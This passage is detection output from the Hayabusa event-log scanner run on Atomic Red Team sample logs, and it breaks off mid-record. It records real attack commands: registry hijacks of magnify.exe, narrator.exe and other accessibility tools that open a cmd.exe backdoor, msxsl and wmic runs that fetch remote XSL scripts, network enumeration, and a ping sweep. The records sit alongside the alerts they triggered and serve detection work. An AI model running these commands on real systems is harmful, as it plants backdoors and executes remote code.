Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2484 | PGUID: 747F3D96-D8A2-5D31-0000-0010D8943200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:13.109 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4212 | PGUID: 747F3D96-D8A5-5D31-0000-0010729B3200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:13.127 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 5000 | PGUID: 747F3D96-D8A5-5D31-0000-0010C39D3200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 5000 | PGUID: 747F3D96-D8A5-5D31-0000-0010C39D3200,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,../hayabusa-rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:13.185 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6116 | PGUID: 747F3D96-D8A5-5D31-0000-0010C0A03200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:14.678 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6888 | PGUID: 747F3D96-D8A6-5D31-0000-001053A73200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:14.692 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 5972 | PGUID: 747F3D96-D8A6-5D31-0000-0010A5A93200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 5972 | PGUID: 747F3D96-D8A6-5D31-0000-0010A5A93200,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,../hayabusa-rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:14.827 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6664 | PGUID: 747F3D96-D8A6-5D31-0000-0010F9B13200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:17.941 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6068 | PGUID: 747F3D96-D8A9-5D31-0000-001072C43200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:17.963 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 5124 | PGUID: 747F3D96-D8A9-5D31-0000-0010C0C63200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 5124 | PGUID: 747F3D96-D8A9-5D31-0000-0010C0C63200,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,../hayabusa-rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:18.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6016 | PGUID: 747F3D96-D8AA-5D31-0000-0010C0C93200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:19.467 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6244 | PGUID: 747F3D96-D8AB-5D31-0000-001054D03200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:19.491 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 5632 | PGUID: 747F3D96-D8AB-5D31-0000-0010A5D23200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:19.516 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 5632 | PGUID: 747F3D96-D8AB-5D31-0000-0010A5D23200,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:19.516 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:19.549 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1888 | PGUID: 747F3D96-D8AB-5D31-0000-0010A4D53200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:25.376 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49727 (MSEDGEWIN10.home) | Dst: 172.217.17.132:80 (ams15s30-in-f4.1e100.net) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:25.376 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:50.046 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4004 | PGUID: 747F3D96-D8CA-5D31-0000-0010DA413300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:50.086 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6268 | PGUID: 747F3D96-D8CA-5D31-0000-0010CF443300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:53.011 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 948 | PGUID: 747F3D96-D8CC-5D31-0000-001038513300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:53.062 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1852 | PGUID: 747F3D96-D8CD-5D31-0000-001047543300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:55.991 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5380 | PGUID: 747F3D96-D8CF-5D31-0000-00109B603300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:56.047 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: wmic.exe process /FORMAT:list | Process: C:\Windows\System32\wbem\WMIC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list"" | LID: 0x50951 | PID: 7040 | PGUID: 747F3D96-D8D0-5D31-0000-0010F3623300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:56.047 +09:00,MSEDGEWIN10,1,medium,Exec,Suspicious WMI Reconnaissance,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmic_reconnaissance.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:56.182 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 396 | PGUID: 747F3D96-D8D0-5D31-0000-001034673300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:06.728 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5340 | PGUID: 747F3D96-D8DA-5D31-0000-0010D3833300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl | Process: C:\Windows\System32\wbem\WMIC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"" | LID: 0x50951 | PID: 3220 | PGUID: 747F3D96-D8DA-5D31-0000-001029863300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,Evas | Exec,SquiblyTwo,,../hayabusa-rules/sigma/process_creation/proc_creation_win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,Exec,Suspicious WMI Reconnaissance,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmic_reconnaissance.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,Evas,XSL Script Processing,,../hayabusa-rules/sigma/process_creation/proc_creation_win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:06.888 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4016 | PGUID: 747F3D96-D8DA-5D31-0000-00100D8A3300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:09.823 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""net view /domain"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4856 | PGUID: 747F3D96-D8DD-5D31-0000-0010EF923300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: net view /domain | Process: C:\Windows\System32\net.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""net view /domain"" | LID: 0x50951 | PID: 3012 | PGUID: 747F3D96-D8DD-5D31-0000-001043953300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,low,Disc,Windows Network Enumeration,,../hayabusa-rules/sigma/process_creation/proc_creation_win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,low,Disc | LatMov,Net.exe Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:22.314 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""net view"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1988 | PGUID: 747F3D96-D8EA-5D31-0000-001030B63300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: net view | Process: C:\Windows\System32\net.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""net view"" | LID: 0x50951 | PID: 4684 | PGUID: 747F3D96-D8EA-5D31-0000-00108AB83300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,low,Disc,Windows Network Enumeration,,../hayabusa-rules/sigma/process_creation/proc_creation_win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,low,Disc | LatMov,Net.exe Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:34.797 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3344 | PGUID: 747F3D96-D8F6-5D31-0000-00100FCB3300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:35.014 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%%i"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4528 | PGUID: 747F3D96-D8F6-5D31-0000-001091D13300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:35.038 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.1 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3876 | PGUID: 747F3D96-D8F7-5D31-0000-0010EDD33300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:35.579 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.2 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2084 | PGUID: 747F3D96-D8F7-5D31-0000-0010E3D83300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:35.988 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.3 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3068 | PGUID: 747F3D96-D8F7-5D31-0000-0010A7E13300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:36.549 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.4 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" 